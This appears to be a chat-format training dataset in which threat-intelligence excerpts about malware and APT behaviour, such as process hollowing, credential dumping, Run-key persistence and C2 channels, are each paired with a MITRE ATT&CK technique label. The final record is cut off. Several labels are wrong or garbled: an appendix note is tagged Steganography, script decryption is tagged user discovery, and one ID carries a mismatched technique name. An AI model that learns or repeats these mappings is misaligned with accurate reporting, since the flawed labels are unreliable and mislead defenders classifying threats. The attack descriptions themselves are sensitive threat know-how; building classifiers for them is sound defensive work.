- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "provides a reverse shell is triggered upon receipt of a packet with a special string, sent to any port."
- },
- {
- "role": "assistant",
- "content": "T1205.001 - Port Knocking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can execute binaries through process hollowing."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin can use the command code \"do_vslist\" to send file names, size, and status to C2."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "At face value, ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com. The first execution of ISMInjector starts by copying itself to %localappdata%\\srvBS.txt and enables persistent access to the system"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used has used Metasploit’s named-pipe impersonation technique to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerSploit contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "leverages social networking sites and cloud platforms (AOL, Twitter, Yandex, Mediafire, pCloud, Dropbox, and Box) for C2."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IcedID has used \"ZwQueueApcThread\" to inject itself into remote processes."
- },
- {
- "role": "assistant",
- "content": "T1055.004 - Process Injection: Asynchronous Procedure Call"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group used a JavaScript backdoor that is capable of collecting a list of the security solutions installed on the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Various implementations of communicate with C2 over HTTP, SMTP, and POP3."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To load the driver, a new service is created using the API CreateServiceW. The name and display name for this service is the 4-character name used for the file name. Next, StartServiceW is called in a loop five times to ensure the driver is loaded. Immediately after the driver is loaded, the service is removed by deleting the entire registry key"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API', 'T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware IndiaIndia obtains and sends to its C2 server information about the first network interface card’s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sometimes it is a high profile, legitimate site such as “diplomacy.pl”, hosting a ZIP archive"
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) The infection chain used in this attack begins with a weaponized link to a Google Drive folder, obfuscated using the goo.gl link shortening service. 2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page. 5) The PowerShell script creates a Cobalt Strike stager payload. This PowerShell script also retrieves an XOR-encoded Cobalt Strike beacon payload from an adversary-controlled domain. 6) The Cobalt Strike Beacon implant beacons to the command-and-control (C2) IP address, which is used to remotely control the implant"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Variants of Emissary have used rundll32.exe in Registry values added to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Analysis APT34 sent a malicious .rtf file (MD5: a0e6933f4e0497269620f44a083b2ed4) as an attachment in a malicious spear phishing email sent to the victim organization"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors executed commands through the installed web shell via Tor exit nodes."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL achieves persistence by adding itself to the \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" Registry key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware can list running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis collects OS information and the computer name from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The following capabilities have been observed in this payload: Get drive information Modify files Modify directories Modify registry Spawn process Terminate process Modify services Kill self Ties to SunOrcal Reaver was used concurrently with SunOrcal over the past year, to include two Reaver samples dropped from zip files hosted on a domain also being used as a SunOrcal C2 (www.fyoutside[.]com), and there is also passive DNS overlap amongst the C2s"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as schtask or crontab to create and schedule tasks that enumerate victim devices and networks."
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cardinal RAT can log keystrokes."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack sets up a Registry Run key to establish a persistence mechanism."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Invoke-Obfuscation calls the variable obfuscation technique used by the actors to obfuscate this script Random Case + {} + Ticks, which changes all variables in the script to have randomly cased characters, to be surrounded in curly braces and to include the tick (`) character, which is ignored in by PowerShell"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic encrypts commands from the C2 server using a hardcoded key."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used browser extensions including Google Chrome to steal passwords and cookies from browsers. Kimsuky has also used Nirsoft's WebBrowserPassView tool to dump the passwords obtained from victims."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 can utilize multiple methods to bypass UAC."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire has modules to interact with the Windows task scheduler."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some variants use HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RegDuke can download files from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor's installer plugin can schedule a new task that loads the dispatcher on boot/logon."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor can obtain application window titles and then determines which windows to perform Screen Capture on."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mustang Panda has used vssadmin to create a volume shadow copy and retrieve the NTDS.dit file. Mustang Panda has also used \"reg save\" on the SYSTEM file Registry location to help extract the NTDS.dit file."
- },
- {
- "role": "assistant",
- "content": "T1003.003 - OS Credential Dumping: NTDS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito runs \"whoami\" on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates the following Registry entry: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Micromedia."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, the threat actors collected files and other data from compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BOOSTWRITE has used the DWriteCreateFactory() function to load additional modules."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avaddon uses registry run keys for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER may use WMI when collecting information about a victim."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE has been executed through use of VBScripts."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NotPetya has the capability to exploit SMBv1 via the well known EternalBlue exploit. Once the exploit is launched, the shellcode will end up writing the file and executing the malware on the target machine."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "route can be used to discover routing configuration information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Domains http://mdzz2019.noip[.]cn:19931 http://mdzz2019.noip[.]cn:3654/ From my analyses, I was able to identify http://mdzz2019.noip[.]cn:19931 as its main C2 url. This is a dynamic DNS, meaning the actual IP changes quite frequently"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When executed, the final macro code as interpreted by CMD decodes into a classic PowerShell download cradle that fetches the initial QakBot payload. There is one last bit of obfuscation here as the script does contain two more encoded strings. One is the URL as seen above in Figure 8, and another is the full path to which the payload will initially be written: “C:\\Users\\Public\\tmpdir\\file”. "
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses RC4 to encrypt C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As part of Reflective DLL loading the malware performs the following tasks on the DLL it has unwrapped in memory: Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL) - Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ixeshe can collect data from a local system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has used ftp for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie is able to achieve persistence via a .lnk file that is stored within the victim’s startup path"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADCALL modifies the firewall Registry key \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfileGloballyOpenPorts\\\\List\"."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We euphemistically refer to the bit fiddling function in the interest of brevity. Looking through it, we see calls to Windows APIs to acquire a cryptographic context provider and generate random bytes. It’s likely this is being used for an inlined crypto implementation and byte overwriting, but the mechanism isn’t entirely clear at this time"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerDuke has commands to get the current directory name as well as the size of a file. It also has commands to obtain information about logical drives, drive type, and free space."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FoggyWeb's loader has reflectively loaded .NET-based assembly/payloads into memory."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. This shellcode is charged with unpacking the encrypted and compressed payload. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the “MZ” and “PE” constants (Fig"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can use PsExec to execute a payload on a remote host. It can also use Service Control Manager to start new services"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to list its directory and logical drives."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers are using a tool with name plainpwd in order to dump Windows credentials from memory. This tool is a slightly modified version of the open-source project mimikatz"
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CostaRicto has set up remote SSH tunneling into the victim's environment from a malicious domain."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hikit has the ability to create a remote shell and run given commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT. The use of open-source tools like Lazagne allows TeamTNT to stay below the radar for a while, making it more difficult for anti-virus companies to detect"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used sc query on a victim to gather information about services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Misdat has attempted to detect if a compromised host had a Japanese keyboard via the Windows API call `GetKeyboardType`."
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Note: see the appendix for a list of the domains, file names, and malware MD5 hash values used to facilitate this activity"
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The executable obtains an embedded PowerShell script, decrypts it using RC4, then decompresses it using ZLIB, and saves the cleartext to C:\\Users\\\\AppData\\Roaming\\Out.jpg"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Drovorub has used a kernel module rootkit to hide processes, files, executables, and network artifacts from user space view."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Linux has decoded XOR encoded strings holding its configuration upon execution."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers system configuration information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware also loads shellcode in an additional resource, MD5: a4808a329b071a1a37b8d03b1305b0cb, which contains the METALJACK payload. The shellcode performs a system survey to collect the victim's computer name and username and then appends those values to a URL string using libjs.inquirerjs[.]com. It then attempts to call out to the URL"
- },
- {
- "role": "assistant",
